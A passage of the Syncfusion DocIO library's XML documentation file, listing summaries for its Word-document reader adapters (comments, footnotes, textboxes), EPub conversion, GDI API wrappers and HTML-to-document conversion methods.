        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.GetNextComment">
            <summary>
            Gets the next comment.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.AddComment(Syncfusion.DocIO.ReaderWriter.WordAnnotationReader)">
            <summary>
            Adds the comment.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.EndOfTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Defines end of text body for annotations.
            </summary>
            <param name="reader"></param>
            <param name="chunkType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.ReadCommentFormat(Syncfusion.DocIO.ReaderWriter.WordAnnotationReader,Syncfusion.DocIO.DLS.WCommentFormat)">
            <summary>
            Reads the comment format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="format">The comment format.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.CurrentComment">
            <summary>
            Gets the current comment.
            </summary>
            <value>The current comment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocReaderAdapter.AnnotationAdapter.Comments">
            <summary>
            Gets the comments.
            </summary>
            <value>The comments.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.m_footEndNotes">
            <summary>
            Array of footnotes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.m_currFootEndNote">
            <summary>
            Current footnote
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.m_currFootEndnoteIndex">
            <summary>
            Index of current footnote/endnote in collection of footnotes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.m_footEndNotesCount">
            <summary>
            Number of footnotes/endnotes in document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.Read(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.GetNextFootEndNote">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.Init(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Initialize FootnoteAdapter
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.AddFootEndNote(Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.EndOfTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="chunkType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.FootnoteAdapter.ReadFootnoteFormat(Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapter.EndnoteAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.EndnoteAdapter.Init(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Initialize EndnoteAdapter.
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.EndnoteAdapter.AddFootEndNote(Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.m_currTextBox">
            <summary>
            Currently used textbox.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.m_txbxCount">
            <summary>
            Number of textboxes in document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.m_textBoxType">
            <summary>
            Type of textbox
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.m_currentTxbxIndex">
            <summary>
            Index of textbox in sequence of textboxes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.m_textBoxCollection">
            <summary>
            Collection of textboxes
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.Read(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            Reads textboxes
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.EndOfTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Defines end of textbox
            </summary>
            <param name="reader"></param>
            <param name="chunkType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.Init(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.CreateAndAddTextBox(Syncfusion.DocIO.ReaderWriter.WordReaderBase)">
            <summary>
            Add textbox to internal textbox collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.ReadTextBoxShape(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,System.Boolean)">
            <summary>
            Reads the text box shape.
            </summary>
            <param name="fspa">The File Shape Address.</param>
            <param name="skipPositionOrigins">The skip position origins.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.TextboxAdapter.GetAutoShapeTextBox(System.Int32)">
            <summary>
            Gets textbox for autoshape by spid.
            </summary>
            <param name="shapeId"></param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocReaderAdapter.HFTextboxAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HFTextboxAdapter.Init(Syncfusion.DocIO.ReaderWriter.WordReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocReaderAdapter.HFTextboxAdapter.EndOfTextBody(Syncfusion.DocIO.ReaderWriter.WordReaderBase,Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="chunkType"></param>
            <returns></returns>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.DocxConstants.DEF_FIT_TEXT_TO_SHAPE">
            <summary>
            String constants
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_archieve">
            <summary>
            Zip archive used to compress the EPub file
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_document">
            <summary>
            Word document to be converted
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_embeddedFiles">
            <summary>
            Holds the files to add their names in package file and stream in archive
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_bookmarks">
            <summary>
            Holds the navigation point and reference for EPub TOC
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_fileName">
            <summary>
            Name of the XHTML file
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_uid">
            <summary>
            Holds the unique identifier (GUID)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_title">
            <summary>
            Refers to the title of the document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_author">
            <summary>
            Refers to the author of the document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_previous">
            <summary>
            Holds the last navigation level
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_playOrder">
            <summary>
            Refers to the playOrder in the NCX file.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EPubConverter.m_coverImage">
            <summary>
            Refers to the cover image
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.#ctor">
            <summary>
            Constructor
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.ConvertToEPub(System.String,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Converts Word to EPub and saves it in disk
            </summary>
            <param name="fileName">Name of the file to save</param>
            <param name="document">Input word document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.ConvertToEPub(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Converts Word to EPub and saves it as stream
            </summary>
            <param name="stream">File stream to save</param>
            <param name="document">Input word document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.ConvertToEPub">
            <summary>
            Converts word document.
            </summary>
            <param name="document">Input word document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.Save(System.String)">
            <summary>
            Saves the EPub in disk
            </summary>
            <param name="fileName">File name to save</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.Save(System.IO.Stream)">
            <summary>
            Saves the EPub as stream
            </summary>
            <param name="stream">File stream to save</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.GenerateContainer">
            <summary>
            Writes Container.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.GenerateNCX">
            <summary>
            Writes EPub document organization as navigation file
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.GenerateTOCNavigationalHTML">
            <summary>
            Generates TOC (Table of Contents) HTML file for navigation in Kindle
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.WriteBookmark(System.String,System.String,System.Xml.XmlWriter)">
            <summary>
            Writes bookmark to .NCX (navigation file) to enable TOC in EPub
            </summary>
            <param name="key">Heading level and id</param>
            <param name="value">Navigation text</param>
            <param name="writer">XmlWriter</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.GenerateOPF">
            <summary>
            Writes EPub document information as package file
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.WriteEmbeddedFiles(System.Xml.XmlTextWriter)">
            <summary>
            Writes the details of all embedded files.
            </summary>
            <param name="writer">XmlTextWriter to write</param>
            <param name="fileName">Name of the embedded file</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.GenerateOPS">
            <summary>
            Generates XHTML and adds it to archive
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.GenerateCoverPage">
            <summary>
            Generates Cover page html if any cover page image is provided. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.EmbedFontFiles">
            <summary>
            Saves the used fonts in the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.UpdateTitle">
            <summary>
            Gets the title of the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.WriteMIME">
            <summary>
            Writes MIME type of EPub
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EPubConverter.GetFormat(System.String)">
            <summary>
            Returns the MIMETYPE for embedded files
            </summary>
            <param name="extension">File extenstion</param>
            <returns>MIMETYPE of the file</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EPubConverter.CoverImage">
            <summary>
            Gets or sets the cover image
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EPubConverter.FileName">
            <summary>
            Gets or sets the file name
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.GdiApi">
            <summary>
            WinAPi functions.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GdiApi.#ctor">
            <summary>
            To prevent construction of a class, we make a private constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GdiApi.SelectObject(System.IntPtr,System.IntPtr)">
            <summary>
            Selects an object into the specified device context (DC).
            The new object replaces the previous object of the same type.
            </summary>
            <param name="hdc">Handle to the DC. </param>
            <param name="hgdiobj">Handle to the object to be selected.</param>
            <returns>If the selected object is not a region and the function succeeds,
            the return value is a handle to the object being replaced.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GdiApi.DeleteObject(System.IntPtr)">
            <summary>
            Deletes a logical pen, brush, font, bitmap, region, or palette,
            freeing all system resources associated with the object.
            After the object is deleted, the specified handle is no longer valid.
            </summary>
            <param name="hdc">Handle to a logical pen, brush, font,
            bitmap, region, or palette.</param>
            <returns>If the function succeeds, the return value is nonzero.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GdiApi.GetFontData(System.IntPtr,System.UInt32,System.UInt32,System.Byte[],System.UInt32)">
            <summary>
            Retrieves font metric data for a TrueType font.
            </summary>
            <param name="hdc">Handle to the device context. </param>
            <param name="dwTable">Specifies the name of a font metric table 
            from which the font data is to be retrieved</param>
            <param name="dwOffset">Specifies the offset from the beginning of the font metric table
            to the location where the function should begin retrieving information.</param>   
            <param name="lpvBuffer">Pointer to a buffer that receives the font information.</param>
            <param name="cbData">Specifies the length in bytes of the information to be retrieved</param>
            <returns>If the function succeeds, the return value is the number of bytes returned.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GdiApi.CreateDC(System.String,System.String,System.String,System.IntPtr)">
            <summary>
            The CreateDC function creates a device context (DC) for a device using the specified name.
            </summary>
            <param name="lpszDriver">Driver name.</param>
            <param name="lpszDevice">Device name.</param>
            <param name="lpszOutput">Not used; should be NULL.</param>
            <param name="lpInitData">Optional printer data.</param>
            <returns>If the function succeeds, the return value is the handle to a DC for the specified device.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.GdiApi.DeleteDC(System.IntPtr)">
            <summary>
            The DeleteDC function deletes the specified device context (DC). 
            </summary>
            <param name="hdc">Handle to the device context.</param>
            <returns>If the function succeeds, the return value is nonzero.</returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HTMLConverterImpl">
            <summary>
            The default implementation of IHtmlConverter.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IHtmlConverter">
            <summary>
            Defines methods to add the Html string to document <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/>.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IHtmlConverter.AppendToTextBody(Syncfusion.DocIO.DLS.ITextBody,System.String,System.Int32,System.Int32)">
            <summary>
            Appends the html string to <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> without style at specified index
            </summary>
            <param name="dlsTextBody">The <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> to which the string is to be added.</param>
            <param name="html">The HTML string.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <param name="paragraphItemIndex">The zero-based index of the paragraph item to insert the html string.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IHtmlConverter.AppendToTextBody(Syncfusion.DocIO.DLS.ITextBody,System.String,System.Int32,System.Int32,Syncfusion.DocIO.DLS.IWParagraphStyle,Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Appends the Html string to <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> with style at specified index
            </summary>
            <param name="dlsTextBody">The <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> to which the Html string is to be added.</param>
            <param name="html">The Html string.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <param name="paragraphItemIndex">The zero-based index of the paragraph item to insert the html string.</param>
            <param name="style">The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> object that specifies the style for the Html string</param>
            <param name="listStyle">The <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> object that specifies the list style for the Html string</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IHtmlConverter.IsValid(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Determines whether the specified Html string is valid.
            </summary>
            <param name="html">The Html string.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member specifies the type to validate the Html string.</param>
            <returns><b>True</b> if the specified Html string is valid, otherwise <b>false</b>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IHtmlConverter.IsValid(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String@)">
            <summary>
            Determines whether the specified Html string is valid.
            </summary>
            <param name="html">The Html string.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member specifies the type to validate the Html string.</param>
            <param name="exceptionMessage">The <b>string</b> that specifies the exception message.</param>
            <returns><b>True</b> if the specified Html string is valid, otherwise <b>false</b>.</returns>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HTMLConverterImpl.m_xmlDoc">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.AppendToTextBody(Syncfusion.DocIO.DLS.ITextBody,System.String,System.Int32,System.Int32,Syncfusion.DocIO.DLS.IWParagraphStyle,Syncfusion.DocIO.DLS.ListStyle)">
            <summary>
            Appends the Html string to <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> with style at specified index
            </summary>
            <param name="dlsTextBody">The <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> to which the Html string is to be added.</param>
            <param name="html">The Html string.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <param name="paragraphItemIndex">The zero-based index of the paragraph item to insert the html string.</param>
            <param name="style">The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> object that specifies the style for the Html string</param>
            <param name="listStyle">The <see cref="T:Syncfusion.DocIO.DLS.ListStyle"/> object that specifies the list style for the Html string</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.AppendToTextBody(Syncfusion.DocIO.DLS.ITextBody,System.String,System.Int32,System.Int32)">
            <summary>
            Appends the html string to <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> without style at specified index
            </summary>
            <param name="dlsTextBody">The <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> to which the string is to be added.</param>
            <param name="html">The HTML string.</param>
            <param name="paragraphIndex">The zero-based index of the paragraph to insert the html string.</param>
            <param name="paragraphItemIndex">The zero-based index of the paragraph item to insert the html string.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseBodyStyle(System.Xml.XmlNode,Syncfusion.DocIO.DLS.ITextBody,System.Int32)">
            <summary>
            Parses the Body style.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyPageFormat(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Apply Page margins and background color
            </summary>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplyPageBorder(Syncfusion.DocIO.DLS.HTMLConverterImpl.TextFormat)">
            <summary>
            Apply Page border
            </summary>
            <param name="pformat"></param>
            <param name="format"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.SetNextStyleForParagraphStyle(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Set Next style for the pararaph style
            </summary>
            <param name="document"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseBodyAttributes(System.Xml.XmlNode)">
            <summary>
            Parse body attributes
            </summary>
            <param name="node"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.RemoveLastLineBreakFromParagraph(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Parse child entities of text body and removes last line break from the paragraph
            </summary>
            <param name="entities"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsValid(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType)">
            <summary>
            Determines whether the specified Html string is valid.
            </summary>
            <param name="html">The Html string.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member specifies the type to validate the Html string.</param>
            <returns><b>True</b> if the specified Html string is valid, otherwise <b>false</b>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsValid(System.String,Syncfusion.DocIO.DLS.XHTMLValidationType,System.String@)">
            <summary>
            Determines whether the specified Html string is valid.
            </summary>
            <param name="html">The Html string.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.XHTMLValidationType"/> member specifies the type to validate the Html string.</param>
            <param name="exceptionMessage">The <b>string</b> that specifies the exception message.</param>
            <returns><b>True</b> if the specified Html string is valid, otherwise <b>false</b>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReplaceHtmlConstantByUnicodeChar(System.String)">
            <summary>
            Replace constants by Unicode
            </summary>
            <param name="html"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReplaceHtmlSpecialCharacters(System.String)">
            <summary>
            Replace HtmlSpecialCharacter's EntityNames by EntityNumbers
            </summary>
            <param name="html"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReplaceHtmlSymbols(System.String)">
            <summary>
            Replace HtmlSymbol's EntityNames by EntityNumbers
            </summary>
            <param name="html"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReplaceHtmlCharacters(System.String)">
            <summary>
            Replace HtmlCharacter's EntityNames by EntityNumbers
            </summary>
            <param name="html"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReplaceHtmlMathSymbols(System.String)">
            <summary>
            Replace HtmlMathSymbol's EntityNames by EntityNumbers
            </summary>
            <param name="html"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReplaceHtmlGreekLetters(System.String)">
            <summary>
            Replace HtmlGreekLetter's EntityNames by EntityNumbers
            </summary>
            <param name="html"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ReplaceHtmlOtherEntities(System.String)">
            <summary>
            Replace Html Other EntityNames by EntityNumbers
            </summary>
            <param name="html"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.LoadXhtml(System.String)">
            <summary>
            Loads the XHTML.
            </summary>
            <param name="html">The HTML.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.LoadXhtml(System.String,System.Xml.Schema.XmlSchema)">
            <summary>
            Load XHTML
            </summary>
            <param name="html"></param>
            <param name="schema"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.PrepareHtml(System.String,System.Xml.Schema.XmlSchema)">
            <summary>
            Prepares the HTML string.
            </summary>
            <param name="html">The HTML string.</param>
            <param name="schema">The schema.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.RemoveXmlAndDocTypeElement(System.String,System.Xml.Schema.XmlSchema)">
            <summary>
            Remove Xml and DocType element from html start
            </summary>
            <param name="html"></param>
            <param name="schema"></param>
            <param name="htmlBegin"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.InsertHtmlElement(System.String,System.Xml.Schema.XmlSchema)">
            <summary>
            Insert DocType elemnet and html start element based on XHTMLValidationType
            </summary>
            <param name="html"></param>
            <param name="schema"></param>
            <param name="htmlBegin"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.GetDocumentTitle">
            <summary>
            Gets the document title 
            </summary>
            <returns>Document title value</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TraverseChildNodes(System.Xml.XmlNodeList)">
            <summary>
            Traverses the child nodes.
            </summary>
            <param name="nodes">The nodes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TraverseTextWithinTag(System.Xml.XmlNode,System.Xml.XmlNode)">
            <summary>
            Traverse text within the tag
            </summary>
            <param name="node"></param>
            <param name="prevNode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsTabText(System.String)">
            <summary>
            Check wether the text is tab or not
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.AddNewParagraphToTextBody(System.Xml.XmlNode)">
            <summary>
            Add the new paragraph to textBody
            </summary>
            <param name="node"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ApplySpanParagraphFormat">
            <summary>
            Applies the paragraph format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsPargraphNeedToBeAdded(System.Xml.XmlNode)">
            <summary>
            Checks whether the paragraph need to be added
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.RemoveWhiteSpacesAtParagraphBegin(System.String,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Remove white spaces at the begining of paragraph
            </summary>
            <param name="text"></param>
            <param name="CurrentPara"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.AddNewParagraph(System.Xml.XmlNode)">
            <summary>
            Adds the new paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.NodeIsInDiv(System.Xml.XmlNode)">
            <summary>
            Determine whether the Node is in Div
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.TraverseParagraphTag(System.Xml.XmlNode)">
            <summary>
            Parses paragraph tags
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsFirstNode(System.Xml.XmlNode)">
            <summary>
            Checks whether this is a first sibling of the parent node
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseTags(System.Xml.XmlNode)">
            <summary>
            Parses the tags.
            </summary>
            <param name="node">The node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseFormField(System.Xml.XmlNode)">
            <summary>
            Parse the FormFields to the Paragraph
            </summary>
            <param name="node"></param>
            <param name="formField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseCheckBoxProperties(System.Xml.XmlNode,Syncfusion.DocIO.DLS.WCheckBox)">
            <summary>
            parses the checkbox size.
            </summary>
            <param name="node"></param>
            <param name="checkbox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.InsertFormField(System.Xml.XmlNode,System.Int32)">
            <summary>
            Insert the form field to the Current Paragraph
            </summary>
            <param name="node"></param>
            <param name="fieldType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.OnInsertFormField(Syncfusion.DocIO.DLS.WFormField)">
            <summary>
            Called when form field inserts - Performs insertion of bookmark start for the corresponding form field.
            </summary>
            <param name="index">Index</param>
            <param name="entity">Entity</param>
            <returns>Updated index</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.ParseDropDownField(System.Xml.XmlNode,Syncfusion.DocIO.DLS.WDropDownFormField)">
            <summary>
            Parse the child Entities for the DropDownItems
            </summary>
            <param name="node"></param>
            <param name="dropDownFormField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsNodeContainAttribute(System.Xml.XmlNode,System.String)">
            <summary>
            Gets the attribute value.
            </summary>
            <param name="node">The node.</param>
            <param name="attrName">Name of the attr.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLConverterImpl.IsEmptyNode(System.Xml.XmlNode)">
            <summary>
            Check whether the tag is empty tag
            </summary>
            <param name="node"></param>
            <returns></returns>
        </member>
